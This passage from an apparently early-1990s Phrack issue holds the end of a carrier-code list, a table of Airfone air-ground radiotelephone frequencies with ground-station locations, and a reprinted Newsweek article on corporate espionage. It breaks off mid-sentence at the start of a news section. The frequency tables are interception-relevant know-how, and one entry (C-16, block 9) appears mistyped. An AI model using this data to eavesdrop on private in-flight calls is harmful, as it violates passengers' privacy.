632 ATX AT&T-C 633 ATX AT&T-C 634 ATX AT&T-C 635 ATX AT&T-C 636 CQU CONQUEST COMMUNICATION CORPORATION 637 ATX AT&T-C 638 ATX AT&T-C 639 BUR BURLINGTON TEL 640 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 641 ATX AT&T-C 642 ATX AT&T-C 643 ATX AT&T-C 644 CMA CALL-AMERICA 645 ATX AT&T-C 646 UTT UNION TELEPHONE COMPANY 647 ATX AT&T-C 648 ATX AT&T-C 649 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 652 ATX AT&T-C 654 ATX AT&T-C 655 ESM EXECULINE OF SACRAMENTO, INC. 656 AVX AMVOX 657 TDD MCI / TELECONNECT 658 TDD MCI / TELECONNECT 659 UTC US TELCOM, INC./US SPRINT 660 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 661 CAN TELCOM CANADA 662 ATX AT&T-C 663 CAN TELCOM CANADA 664 MCI MCI TELECOMMUNICATIONS CORPORATION 665 CAN TELCOM CANADA 666 MCI MCI TELECOMMUNICATIONS CORPORATION 667 CAN TELCOM CANADA 668 CAN TELCOM CANADA 669 UTC US TELCOM, INC./US SPRINT 672 ATX AT&T-C 673 SNT MCI / TDD / SOUTHERNNET, INC. 674 TDD MCI / TELECONNECT 675 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 676 UTC US TELCOM, INC./US SPRINT 677 MCI MCI TELECOMMUNICATIONS CORPORATION 678 MCI MCI TELECOMMUNICATIONS CORPORATION 679 VOB TRANS-NET, INC. 680 2408 PACIFIC TELCOM 682 ATX AT&T-C 683 MTD METROMEDIA LONG DISTANCE 684 NTQ NORTHERN TELECOM, INC. 685 MCI MCI TELECOMMUNICATIONS CORPORATION 686 LGT LITEL 687 NTS NTS COMMUNICATIONS 688 MCI MCI TELECOMMUNICATIONS CORPORATION 689 NWS NORTHWEST TELCO 691 32D1 DOMIN REPUBLIC TELEPHONE 692 ATX AT&T-C 693 JJJ TRI-J 694 TZC TELESCAN 695 MCI MCI TELECOMMUNICATIONS CORPORATION 696 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 698 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 699 PLG PILGRIM TELEPHONE CO. 702 RCCP RADIO COMMON CARRIER PAGING 712 RCCP RADIO COMMON CARRIER PAGING 720 TGN TELEMANAGEMENT CONSULT'T CORP 721 FLX FLEX COMMUNICATIONS 722 ATX AT&T-C 723 MCI MCI TELECOMMUNICATIONS CORPORATION 724 RTC RCI CORPORATION 725 ATL ATC 726 UTC US TELCOM, INC./US SPRINT 727 MCI MCI TELECOMMUNICATIONS CORPORATION 728 TDD MCI / TELECONNECT 729 UTC US TELCOM, INC./US SPRINT 732 ATX AT&T-C 733 UTC US TELCOM, INC./US SPRINT 734 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 735 UTC US TELCOM, INC./US SPRINT 736 UTC US TELCOM, INC./US SPRINT 737 MEC MERCURY, INC. 738 MEC MERCURY, INC. 741 ATL ATC 742 ATX AT&T-C 743 UTC US TELCOM, INC./US SPRINT 744 TRA3 TRAFFIC ROUTING ADMINISTRATION 3 745 UTC US TELCOM, INC./US SPRINT 746 FTC FTC COMMUNICATIONS, INCORPORATION 747 TDD MCI / TELECONNECT 748 TDD MCI / TELECONNECT 749 ATL ATC 752 ATX AT&T-C 753 MCI MCI TELECOMMUNICATIONS CORPORATION 754 TSH TEL-SHARE 755 UTC US TELCOM, INC./US SPRINT 756 MCI MCI TELECOMMUNICATIONS CORPORATION 757 TID TMC OF SOUTH CENTRAL INDIANA 759 MCI MCI TELECOMMUNICATIONS CORPORATION 761 ACX ALTERNATE COMMUNICATIONS TECHNOLOGY 762 ATX AT&T-C 763 TON TOUCH & SAVE 764 AAM ALASCOM 765 MCI MCI TELECOMMUNICATIONS CORPORATION 766 MCI MCI TELECOMMUNICATIONS CORPORATION 767 UTC US TELCOM, INC./US SPRINT 768 SNT MCI / TDD / SOUTHERNNET, INC. 770 3300 GENERAL COMMUNICATIONS 771 SNT MCI / TDD / SOUTHERNNET, INC. 772 ATX AT&T-C 773 CUX COMPU-TEL INC. 774 TTQ TTE OF CHARLESTON 776 UTC US TELCOM, INC./US SPRINT 777 MCI MCI TELECOMMUNICATIONS CORPORATION 778 EDS ELECTRONIC DATA SYSTEMS CORPORATION 779 TDD MCI / TELECONNECT 780 SNT MCI / TDD / SOUTHERNNET, INC. 782 ATX AT&T-C 783 ALN ALLNET COMMUNICATIONS SERVICES 784 ALG AMERICAN LONG LINE 785 SNH SUNSHINE TELEPHONE CO. 786 0341 UNITED/FLORIDA 787 MAD MID ATLANTIC TELECOM 788 UTC US TELCOM, INC./US SPRINT 789 TMU TEL-AMERICA, INC. 792 ATX AT&T-C 794 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 797 TAM TMC OF SOUTH CENTRAL INDIANA 798 TDD MCI / TELECONNECT 800 UTC US TELCOM, INC./US SPRINT 802 RCCP RADIO COMMON CARRIER PAGING 807 NTI NETWORK TELECOMMUNICATIONS 808 AAX AMERITECH AUDIOTEX SERVICES 812 RCCP RADIO COMMON CARRIER PAGING 821 ATX AT&T-C 822 ATX AT&T-C 823 THA TOUCH AMERICA 824 ATX AT&T-C 825 MCI MCI TELECOMMUNICATIONS CORPORATION 826 ATX AT&T-C 827 UTC US TELCOM, INC./US SPRINT 828 ATX AT&T-C 829 UTC US TELCOM, INC./US SPRINT 831 ATX AT&T-C 832 ATX AT&T-C 833 ATX AT&T-C 834 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 835 ATX AT&T-C 836 TDD MCI / TELECONNECT 837 TDD MCI / TELECONNECT 838 0567 UNITED/INT MN 839 VST STAR-LINE 841 ATX AT&T-C 842 ATX AT&T-C 843 ATX AT&T-C 844 LDD LDDS COMMUNICATIONS 845 ATX AT&T-C 846 MCI MCI TELECOMMUNICATIONS CORPORATION 847 ATX AT&T-C 848 ATX AT&T-C 849 BTM BUSINESS TELECOM, INC. 850 TKC TK COMMUNICATIONS 851 ATX AT&T-C 852 ATX AT&T-C 853 UTY UNIVERSAL COMMUNICATIONS 854 ATX AT&T-C 855 ATX AT&T-C 857 TDD MCI / TELECONNECT 858 ATX AT&T-C 860 VNS VIRTUAL NETWORK 862 ATX AT&T-C 863 ALN ALLNET COMMUNICATIONS SERVICES 864 TEN TELESPHERE NETWORK 865 3100 HAWAIIAN TELEPHONE 866 MCI MCI TELECOMMUNICATIONS CORPORATION 867 RBL VORTEL 868 SNT MCI / TDD / SOUTHERNNET, INC. 869 UTC US TELCOM, INC./US SPRINT 871 TXL DIGITAL NETWORK, INC. 872 ATX AT&T-C 873 MCI MCI TELECOMMUNICATIONS CORPORATION 874 ATX AT&T-C 875 ALN ALLNET COMMUNICATIONS SERVICES 876 MCI MCI TELECOMMUNICATIONS CORPORATION 877 UTC US TELCOM, INC./US SPRINT 878 ALN ALLNET COMMUNICATIONS SERVICES 879 MCI MCI TELECOMMUNICATIONS CORPORATION 880 NTV NATIONAL TELECOMMUNICATIONS 881 NTV NATIONAL TELECOMMUNICATIONS 882 ATX AT&T-C 883 TDX CABLE & WIRELESS COMMUNICATIONS 884 UTC US TELCOM, INC./US SPRINT 885 SDY TELVUE,CORP 886 ALN ALLNET COMMUNICATIONS SERVICES 887 ETS EASTERN TELEPHONE SYSTEMS, INC. 888 MCI MCI TELECOMMUNICATIONS CORPORATION 889 2408 PACIFIC TELCOM 890 ATZ ATX-COMMUNICATIONS 891 TVT TMC COMMUNICATIONS 892 ATX AT&T-C 896 TXN TEX-NET 898 CGI COMMUNICATIONS GROUP OF JACKSON 899 TDX CABLE & WIRELESS COMMUNICATIONS 902 RCCP RADIO COMMON CARRIER PAGING 908 AAX AMERITECH AUDIOTEX SERVICES 912 RCCP RADIO COMMON CARRIER PAGING 922 ATX AT&T-C 923 ALN ALLNET COMMUNICATIONS SERVICES 924 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER 925 MCI MCI TELECOMMUNICATIONS CORPORATION 926 MCI MCI TELECOMMUNICATIONS CORPORATION 927 UTC US TELCOM, INC./US SPRINT 928 ALU AMERICALL SYSTEMS - LOUISIANNA 932 ATX AT&T-C 933 MCI MCI TELECOMMUNICATIONS CORPORATION 934 MCI MCI TELECOMMUNICATIONS CORPORATION 936 RBW R-COMM 937 MCI MCI TELECOMMUNICATIONS CORPORATION 939 TZX TELENATIONAL COMMUNICATIONS 940 TSF ATC / SOUTH TEL 942 ATX AT&T-C 943 AUU AUS, INC. 944 MCI MCI TELECOMMUNICATIONS CORPORATION 945 MCI MCI TELECOMMUNICATIONS CORPORATION 946 API PHONE ONE - AMERICAN PIONEER TELEPHONE 947 MCI MCI TELECOMMUNICATIONS CORPORATION 948 PHX PHOENIX NETWORK 950 MCI MCI TELECOMMUNICATIONS CORPORATION 951 BML PHONE AMERICA 952 ATX AT&T-C 955 MCI MCI TELECOMMUNICATIONS CORPORATION 960 CNO COMTEL OF NEW ORLEANS 962 ATX AT&T-C 963 SOC STATE OF CALIFORNIA 964 MCI MCI TELECOMMUNICATIONS CORPORATION 965 TLX TMC OF LEXINGTON 966 TDX CABLE & WIRELESS COMMUNICATIONS 967 MCI MCI TELECOMMUNICATIONS CORPORATION 968 TED TELEDIAL AMERICA 969 TDX CABLE & WIRELESS COMMUNICATIONS 972 ATX AT&T-C 980 VLW VALU-LINE OF LONGVIEW, INC. 981 32P1 PUERTO RICO TELEPHONE 982 ATX AT&T-C 983 WUT WESTERN UNION TELEGRAPH CO. 986 WUT WESTERN UNION TELEGRAPH CO. 987 BTL BITTEL TELECOMMUNICATIONS CORPORATION 988 TDD MCI / TELECONNECT 989 TDX CABLE & WIRELESS COMMUNICATIONS 990 FEB FEB CORPORATION 992 ATX AT&T-C 993 LKS ? 996 VOA VALU-LINE 999 MCI MCI TELECOMMUNICATIONS CORPORATION _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 8 of 13 Air Fone Frequencies by Leroy Donnelly Leroy.Donnelly@IVGATE.OMAHUG.ORG This is a quick file on the subject of what frequencies are used for Air Fone Telephone while in-flight air-to-ground. The following should give you some an understanding of how it all works. The FCC has issued rules on allocation of the 849-851/894-895 MHz bands for air-ground radiotelephone service. The most recent action was effective September 9, 1991: 1) Changed channel spacing from GTE Airfone Inc.'s de facto standards; 2) Ordered GTE to make its service available to other air-ground licensees at non-discriminatory rates; 3) Divided each channel block into 6 control channels (P-1 through P-6) and 29 communications channels (C-1 through C-29); 4) Provided for a communications channel bandwidth of 6 kHz; 5) Gave GTE 22 months to modify its current control channel scheme; during this period, GTE can use the lower 20 kHz of each channel block, which includes channels C-1, C-2, and C-3, for control. GTE then has another 38 months during which it can only use a 3.2 kHz control channel in channel C-2 of each channel block. After these transition periods end (September of 1996), GTE must switch to control channels marked P-1 through P-6 in the tables below; 6) Empowered the FCC to assign exclusively one control channel to each air-ground licensee; 7) Limited the ERP of airborne stations to 30 watts maximum; and that of ground stations to 100 watts maximum; 8) Limited the ERP of ground stations to 1 watt when communicating with aircraft on the ground. GROUND TO AIR CHANNELS (NOTE: "GB" in these listings denotes Guard Band, a series of 3 kHz spacings to separate communications channels from control channels.) CH. # CHANNEL BLOCK 10 9 8 7 6 C-1 849.0055 849.2055 849.4055 849.6055 849.8055 C-2 849.0115 849.2115 849.4115 849.6115 849.8115 C-3 849.0175 849.2175 849.4175 849.6175 849.8175 C-4 849.0235 849.2235 849.4235 849.6235 849.8235 C-5 849.0295 849.2295 849.4295 849.6295 849.8295 C-6 849.0355 849.2355 849.4355 849.6355 849.8355 C-7 849.0415 849.2415 849.4415 849.6415 849.8415 C-8 849.0475 849.2475 849.4475 849.6475 849.8475 C-9 849.0535 849.2535 849.4535 849.6535 849.8535 C-10 849.0595 849.2595 849.4595 849.6595 849.8595 C-11 849.0655 849.2655 849.4655 849.6655 849.8655 C-12 849.0715 849.2715 849.4715 849.6715 849.8715 C-13 849.0775 849.2775 849.4775 849.6775 849.8775 C-14 849.0835 849.2835 849.4835 849.6835 849.8835 C-15 849.0895 849.2895 849.4895 849.6895 849.8895 C-16 849.0955 849.2855 849.4955 849.6955 849.8955 C-17 849.1015 849.3015 849.5015 849.7015 849.9015 C-18 849.1075 849.3075 849.5075 849.7075 849.9075 C-19 849.1135 849.3135 849.5135 849.7135 849.9135 C-20 849.1195 849.3195 849.5195 849.7195 849.9195 C-21 849.1255 849.3255 849.5255 849.7255 849.9255 C-22 849.1315 849.3315 849.5315 849.7315 849.9315 C-23 849.1375 849.3375 849.5375 849.7375 849.9375 C-24 849.1435 849.3435 849.5435 849.7435 849.9435 C-25 849.1495 849.3495 849.5495 849.7495 849.9495 C-26 849.1555 849.3555 849.5555 849.7555 849.9555 C-27 849.1615 849.3615 849.5615 849.7615 849.9615 C-28 849.1675 849.3675 849.5675 849.7675 849.9675 C-29 849.1735 849.3735 849.5735 849.7735 849.9735 GB 849.1765 849.3765 849.5765 849.7765 849.9765 to to to to to 849.1797 849.3797 849.5797 849.7797 849.9797 P-6 849.1813 849.3813 849.5813 849.7813 849.9813 P-5 849.1845 849.3845 849.5845 849.7845 849.9845 P-4 849.1877 849.3877 849.5877 849.7877 849.9877 P-3 849.1909 849.3909 849.5909 849.7909 849.9909 P-2 849.1941 849.3941 849.5941 849.7941 849.9941 P-1 849.1973 849.3973 849.5973 849.7973 849.9973 5 4 3 2 1 C-1 850.0055 850.2055 850.4055 850.6055 850.8055 C-2 850.0115 850.2115 850.4115 850.6115 850.8115 C-3 850.0175 850.2175 850.4175 850.6175 850.8175 C-4 850.0235 850.2235 850.4235 850.6235 850.8235 C-5 850.0295 850.2295 850.4295 850.6295 850.8295 C-6 850.0355 850.2355 850.4355 850.6355 850.8355 C-7 850.0415 850.2415 850.4415 850.6415 850.8415 C-8 850.0475 850.2475 850.4475 850.6475 850.8475 C-9 850.0535 850.2535 850.4535 850.6535 850.8535 C-10 850.0595 850.2595 850.4595 850.6595 850.8595 C-11 850.0655 850.2655 850.4655 850.6655 850.8655 C-12 850.0715 850.2715 850.4715 850.6715 850.8715 C-13 850.0775 850.2775 850.4775 850.6775 850.8775 C-14 850.0835 850.2835 850.4835 850.6835 850.8835 C-15 850.0895 850.2895 850.4895 850.6895 850.8895 C-16 850.0955 850.2855 850.4955 850.6955 850.8955 C-17 850.1015 850.3015 850.5015 850.7015 850.9015 C-18 850.1075 850.3075 850.5075 850.7075 850.9075 C-19 850.1135 850.3135 850.5135 850.7135 850.9135 C-20 850.1195 850.3195 850.5195 850.7195 850.9195 C-21 850.1255 850.3255 850.5255 850.7255 850.9255 C-22 850.1315 850.3315 850.5315 850.7315 850.9315 C-23 850.1375 850.3375 850.5375 850.7375 850.9375 C-24 850.1435 850.3435 850.5435 850.7435 850.9435 C-25 850.1495 850.3495 850.5495 850.7495 850.9495 C-26 850.1555 850.3555 850.5555 850.7555 850.9555 C-27 850.1615 850.3615 850.5615 850.7615 850.9615 C-28 850.1675 850.3675 850.5675 850.7675 850.9675 C-29 850.1735 850.3735 850.5735 850.7735 850.9735 GB 850.1765 850.3765 850.5765 850.7765 850.9765 to to to to to 850.1797 850.3797 850.5797 850.7797 850.9797 P-6 850.1813 850.3813 850.5813 850.7813 850.9813 P-5 850.1845 850.3845 850.5845 850.7845 850.9845 P-4 850.1877 850.3877 850.5877 850.7877 850.9877 P-3 850.1909 850.3909 850.5909 850.7909 850.9909 P-2 850.1941 850.3941 850.5941 850.7941 850.9941 P-1 850.1973 850.3973 850.5973 850.7973 850.9973 AIR TO GROUND CHANNELS CH. # CHANNEL BLOCK 10 9 8 7 6 C-1 894.0055 894.2055 894.4055 894.6055 894.8055 C-2 894.0115 894.2115 894.4115 894.6115 894.8115 C-3 894.0175 894.2175 894.4175 894.6175 894.8175 C-4 894.0235 894.2235 894.4235 894.6235 894.8235 C-5 894.0295 894.2295 894.4295 894.6295 894.8295 C-6 894.0355 894.2355 894.4355 894.6355 894.8355 C-7 894.0415 894.2415 894.4415 894.6415 894.8415 C-8 894.0475 894.2475 894.4475 894.6475 894.8475 C-9 894.0535 894.2535 894.4535 894.6535 894.8535 C-10 894.0595 894.2595 894.4595 894.6595 894.8595 C-11 894.0655 894.2655 894.4655 894.6655 894.8655 C-12 894.0715 894.2715 894.4715 894.6715 894.8715 C-13 894.0775 894.2775 894.4775 894.6775 894.8775 C-14 894.0835 894.2835 894.4835 894.6835 894.8835 C-15 894.0895 894.2895 894.4895 894.6895 894.8895 C-16 894.0955 894.2855 894.4955 894.6955 894.8955 C-17 894.1015 894.3015 894.5015 894.7015 894.9015 C-18 894.1075 894.3075 894.5075 894.7075 894.9075 C-19 894.1135 894.3135 894.5135 894.7135 894.9135 C-20 894.1195 894.3195 894.5195 894.7195 894.9195 C-21 894.1255 894.3255 894.5255 894.7255 894.9255 C-22 894.1315 894.3315 894.5315 894.7315 894.9315 C-23 894.1375 894.3375 894.5375 894.7375 894.9375 C-24 894.1435 894.3435 894.5435 894.7435 894.9435 C-25 894.1495 894.3495 894.5495 894.7495 894.9495 C-26 894.1555 894.3555 894.5555 894.7555 894.9555 C-27 894.1615 894.3615 894.5615 894.7615 894.9615 C-28 894.1675 894.3675 894.5675 894.7675 894.9675 C-29 894.1735 894.3735 894.5735 894.7735 894.9735 GB 894.1765 894.3765 894.5765 894.7765 894.9765 to to to to to 894.1797 894.3797 894.5797 894.7797 894.9797 P-6 894.1813 894.3813 894.5813 894.7813 894.9813 P-5 894.1845 894.3845 894.5845 894.7845 894.9845 P-4 894.1877 894.3877 894.5877 894.7877 894.9877 P-3 894.1909 894.3909 894.5909 894.7909 894.9909 P-2 894.1941 894.3941 894.5941 894.7941 894.9941 P-1 894.1973 894.3973 894.5973 894.7973 894.9973 5 4 3 2 1 C-1 895.0055 895.2055 895.4055 895.6055 895.8055 C-2 895.0115 895.2115 895.4115 895.6115 895.8115 C-3 895.0175 895.2175 895.4175 895.6175 895.8175 C-4 895.0235 895.2235 895.4235 895.6235 895.8235 C-5 895.0295 895.2295 895.4295 895.6295 895.8295 C-6 895.0355 895.2355 895.4355 895.6355 895.8355 C-7 895.0415 895.2415 895.4415 895.6415 895.8415 C-8 895.0475 895.2475 895.4475 895.6475 895.8475 C-9 895.0535 895.2535 895.4535 895.6535 895.8535 C-10 895.0595 895.2595 895.4595 895.6595 895.8595 C-11 895.0655 895.2655 895.4655 895.6655 895.8655 C-12 895.0715 895.2715 895.4715 895.6715 895.8715 C-13 895.0775 895.2775 895.4775 895.6775 895.8775 C-14 895.0835 895.2835 895.4835 895.6835 895.8835 C-15 895.0895 895.2895 895.4895 895.6895 895.8895 C-16 895.0955 895.2855 895.4955 895.6955 895.8955 C-17 895.1015 895.3015 895.5015 895.7015 895.9015 C-18 895.1075 895.3075 895.5075 895.7075 895.9075 C-19 895.1135 895.3135 895.5135 895.7135 895.9135 C-20 895.1195 895.3195 895.5195 895.7195 895.9195 C-21 895.1255 895.3255 895.5255 895.7255 895.9255 C-22 895.1315 895.3315 895.5315 895.7315 895.9315 C-23 895.1375 895.3375 895.5375 895.7375 895.9375 C-24 895.1435 895.3435 895.5435 895.7435 895.9435 C-25 895.1495 895.3495 895.5495 895.7495 895.9495 C-26 895.1555 895.3555 895.5555 895.7555 895.9555 C-27 895.1615 895.3615 895.5615 895.7615 895.9615 C-28 895.1675 895.3675 895.5675 895.7675 895.9675 C-29 895.1735 895.3735 895.5735 895.7735 895.9735 GB 895.1765 895.3765 895.5765 895.7765 895.9765 to to to to to 895.1797 895.3797 895.5797 895.7797 895.9797 P-6 895.1813 895.3813 895.5813 895.7813 895.9813 P-5 895.1845 895.3845 895.5845 895.7845 895.9845 P-4 895.1877 895.3877 895.5877 895.7877 895.9877 P-3 895.1909 895.3909 895.5909 895.7909 895.9909 P-2 895.1941 895.3941 895.5941 895.7941 895.9941 P-1 895.1973 895.3973 895.5973 895.7973 895.9973 GEOGRAPHICAL CHANNEL BLOCK LAYOUT (Ground stations using the same channel block must be at least 300 miles apart) LOCATION CH. BLOCK ALASKA Anchorage 8 Cordova 5 Ketchikan 5 Juneau 4 Sitka 7 Yakutat 8 ALABAMA Birmingham 2 ARIZONA Phoenix 4 Winslow 6 ARKANSAS Pine Bluff 8 CALIFORNIA Blythe 10 Eureka 8 Los Angeles 4 Oakland 1 S. San Fran. 6 Visalia 7 COLORADO Colorado Spgs. 8 Denver 1 Hayden 6 FLORIDA Miami 4 Orlando 2 Tallahassee 7 GEORGIA Atlanta 5 St. Simons Is. 6 HAWAII Mauna Kapu 5 IDAHO Blackfoot 8 Caldwell 10 ILLINOIS Chicago 3 Kewanee 5 Schiller Park 2 INDIANA Fort Wayne 7 IOWA Des Moines 1 KANSAS Garden City 3 Wichita 7 KENTUCKY Fairdale 6 LOUISIANA Kenner 3 Shreveport 5 MASSACHUSETTS Boston 7 MICHIGAN Bellville 8 Flint 9 Sault S. Marie 6 MINNESOTA Bloomington 9 MISSISSIPPI Meridian 9 MISSOURI Kansas City 6 St. Louis 4 Springfield 9 MONTANA Lewistown 5 Miles City 8 Missoula 3 NEBRASKA Grand Island 2 Ogallala 4 NEVADA Las Vegas 1 Reno 3 Tonopah 9 Winnemucca 4 NEW MEXICO Alamogordo 8 Albuquerque 10 Aztec 9 Clayton 5 NEW JERSEY Woodbury 3 NEW YORK E. Elmhurst 1 Schuyler 2 Staten Island 9 NORTH CAROLINA Greensboro 9 Wilmington 3 NORTH DAKOTA Dickinson 7 OHIO Pataskala 1 OKLAHOMA Warner 4 Woodward 9 OREGON Albany 5 Klamath Falls 2 Pendleton 7 PENNSYLVANIA Coraopolis 4 New Cumberland 8 SOUTH CAROLINA Charleston 4 SOUTH DAKOTA Aberdeen 6 Rapid City 5 TENNESSEE Elizabethton 7 Memphis 10 Nashville 3 TEXAS Austin 2 Bedford 1 Houston 9 Lubbock 7 Monahans 6 UTAH Abajo Peak 7 Delta 2 Escalante 5 Green River 3 Salt Lake City 1 VIRGINIA Arlington 6 WASHINGTON Seattle 4 Cheney 1 WEST VIRGINIA Charleston 2 WISCONSIN Stevens Point 8 WYOMING Riverton 9 _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 9 of 13 THE OPEN BARN DOOR U.S. Firms Face A Wave Of Foreign Espionage By Douglas Waller Newsweek, May 4, 1992, Page 58 It's tough enough these days for American companies to compete with their Pacific Rim rivals, even when the playing field is level. It's a lot tougher when your trade secrets are peddled by competitors. One Dallas computer maker, for example, recently spotted its sensitive pricing information in the bids of a South Korean rival. The firm hired a detective agency, Phoenix Investigations, which found an innocent-looking plastic box in a closet at its headquarters. Inside was a radio transmitter wired to a cable connected to a company fax machine. The bug had been secretly installed by a new worker -- a mole planted by the Korean company. "American companies don't believe this kind of stuff can happen," says Phoenix president Richard Aznaran. "By the time they come to us the barn door is wide open." Welcome to a world order where profits have replaced missiles as the currency of power. Industrial espionage isn't new, and it isn't always illegal, but as firms develop global reach, they are acquiring new vulnerability to economic espionage. In a survey by the American Society for Industrial Security last year, 37 percent of the 165 U.S. firms responding said they had been targets of spying. The increase has been so alarming that both the CIA and the FBI have beefed up their economic counterintelligence programs. The companies are mounting more aggressive safeguards, too. Kellog Company has halted public tours at its Battle Creek, Michigan, facility because spies were slipping in to photograph equipment. Eastman Kodak Company classifies documents, just like the government. Lotus Development Corporation screens cleaning crews that work at night. "As our computers become smaller, it's easier for someone to walk off with one," says Lotus spokesperson Rebecca Seel. To be sure, some U.S. firms have been guilty of espionage themselves -- though they tend not to practice it overseas, because foreign companies have a tighter hold on their secrets. And American companies now face an additional hazard: The professional spy services of foreign nations. "We're finding intelligence organizations from countries we've never looked at before who are active in the U.S.," says the FBI's R. Patrick Watson. Foreign intelligence agencies traditionally thought friendly to the United States "are trying to plant moles in American high-tech companies [and] search the briefcases of American business men traveling overseas," warns CIA Director Robert Gates. Adds Noell Matchett, a former National Security Agency official: "What we've got is this big black hole of espionage going on all over the world and a naive set of American business people being raped." No one knows quite how much money U.S. businesses lost to this black hole. Foreign governments refuse to comment on business intelligence they collect. The victims rarely publicize the espionage or report it to authorities for fear of exposing vulnerabilities to stockholders. But more than 30 companies and security experts NEWSWEEK contacted claimed billions of dollars are lost annually from stolen trade secrets and technology. This week a House Judiciary subcommittee is holding hearings to assess the damage. IBM, which has been targeted by French and Japanese intelligence operations, estimates $1 billion lost from economic espionage and software piracy. IBM won't offer specifics, but says that the espionage "runs the gamut from items missing off loading docks to people looking over other people's shoulders in airplanes." Most brazen: France's intelligence service, the Direction Generale de la Securite Exterieure (DGSE), has been the most brazen about economic espionage, bugging seats of businessmen flying on airliners and ransacking their hotel rooms for documents, say intelligence sources. Three years ago the FBI delivered private protests to Paris after it discovered DGSE agents trying to infiltrate European branch offices of IBM and Texas Instruments to pass secrets to a French competitor. The complaint fell on deaf ears. The French intelligence budget was increased 9 percent this year, to enable the hiring of 1,000 new employees. A secret CIA report recently warned of French agents roaming the United States looking for business secrets. Intelligence sources say the French Embassy in Washington has helped French engineers spy on the stealth technology used by American warplane manufacturers. "American businessmen who stay in Paris hotels should still assume that the contents of their briefcases will be photocopied," says security consultant Paul Joyal. DGSE officials won't comment. The French are hardly alone in business spying. NSA officials suspect British intelligence of monitoring the overseas phone calls of American firms. Investigators who just broke up a kidnap ring run by former Argentine intelligence and police officials suspect the ring planted some 500 wiretaps on foreign businesses in Buenos Aires and fed the information to local firms. The Ackerman Group Inc., a Miami consulting firm that tracks espionage, recently warned clients about Egyptian intelligence agents who break into the hotel rooms of visiting execs with "distressing frequency." How do the spies do it? Bugs and bribes are popular tools. During a security review of a U.S. manufacturer in Hong Kong, consultant Richard Hefferman discovered that someone had tampered with the firm's phone-switching equipment in a closet. He suspects that agents posing as maintenance men sneaked into the closet and reprogrammed the computer routing phone calls so someone outside the building -- Heffernan never determined who -- could listen in simply by punching access codes into his phone. Another example: After being outbid at the last minute by a Japanese competitor, a Midwestern heavy manufacturer hired Parvus Company, a Maryland security firm made up mostly of former CIA and NSA operatives. Parvus investigators found that the Japanese firm had recruited one of the manufacturer's midlevel managers with a drug habit to pass along confidential bidding information. Actually, many foreign intelligence operations are legal. "The science and technology in this country is theirs for the taking so they don't even have to steal it," says Michael Sekora of Technology Strategic Planning, Inc. Take company newsletters, which are a good source of quota data. With such information in hand, a top agent can piece together production rates. American universities are wide open, too: Japanese engineers posing as students feed back to their home offices information on school research projects. "Watch a Japanese tour team coming through a plant or convention," says Robert Burke with Monsanto Company. "They video everything and pick up every sheet of paper." Computer power: In the old days a business spy visited a bar near a plant to find loose-lipped employees. Now all he needs is a computer, modem and phone. There are some 10,000 computer bulletin boards in the United States -- informal electronic networks that hackers, engineers, scientists and government bureaucrats set up with their PCs to share business gossip, the latest research on aircraft engines, even private White House phone numbers. An agent compiles a list of key words for the technology he wants, which trigger responses from bulletin boards. Then, posing as a student wanting information, he dials from his computer the bulletin boards in a city where the business is located and "finds a Ph.D. who wants to show off," says Thomas Sobczak of Application Configured Computers, Inc. Sobczak once discovered a European agent using a fake name who posed questions about submarine engines to a bulletin board near Groton, Connecticut. The same questions, asked under a different hacker's name, appeared on bulletin boards in Charleston, South Carolina, and Bremerton, Washington. Navy submarines are built or based at all three cities. Using information from phone intercepts, the NSA occasionally tips off U.S. firms hit by foreign spying. In fact, Director Gates has promised he'll do more to protect firms from agents abroad by warning them of hostile penetrations. The FBI has expanded its economic counterintelligence program. The State Department also has begun a pilot program with 50 Fortune 500 companies to allow their execs traveling abroad to carry the same portable secure phones that U.S. officials use. But U.S. agencies are still groping for a way to join the business spy war. The FBI doesn't want companies to have top-of-the-line encryption devices for fear the bureau won't be able to break their codes to tap phone calls in criminal investigations. And the CIA is moving cautiously because many of the foreign intelligence services "against whom you're going to need the most protection tend to be its closest friends," says former CIA official George Carver. Even American firms are leery of becoming too cozy with their government's agents. But with more foreign spies coming in for the cash, American companies must do more to protect their secrets. How the Spies Do It MONEY TALKS Corporate predators haven't exactly been shy about greasing a few palms. In some cases they glean information simply by bribing American employees. In others, they lure workers on the pretense of hiring them for an important job, only to spend the interview pumping them for information. If all else fails, the spies simply hire the employees away to get at their secrets, and chalk it all up to the cost of doing business. STOP, LOOK, LISTEN A wealth of intelligence is hidden in plain sight -- right inside public records such as stockholder reports, newsletters, zoning applications and regulatory filings. Eavesdropping helps, too. Agents can listen to execs' airplane conversations from six seats away. Some sponsor conferences and invite engineers to present papers. Japanese businessmen are famous for vacuuming up handouts at conventions and snapping photos on plant tours. BUGS Electronic transmitters concealed inside ballpoint pens, pocket calculators and even wall paneling can broadcast conversations in sensitive meetings. Spies can have American firms' phone calls rerouted from the switching stations to agents listening in. Sometimes, they tap cables attached to fax machines. HEARTBREAK HOTEL Planning to leave your briefcase back at the hotel? The spooks will love you. One of their ploys is to sneak into an room, copy documents and pilfer computer disks. Left your password sitting around? Now they have entry to your company's entire computer system. _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 10 of 13 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Issue XXXIX / Part One of Four PWN PWN PWN PWN Compiled by Datastream Cowboy PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN To Some Hackers, Right And Wrong Don't Compute May 11, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Bruce V. Bigelow (San Diego Union-Tribune) Special Thanks to Ripper of HALE The telephone call was anonymous, and the young, male voice was chatty and nonchalant. He wanted to explain a few things about hacking, the black art of tapping into private computers. He was one of several hackers to call, both frightened and intrigued by a San Diego police investigation into an informal network of computer criminals using high-tech methods to 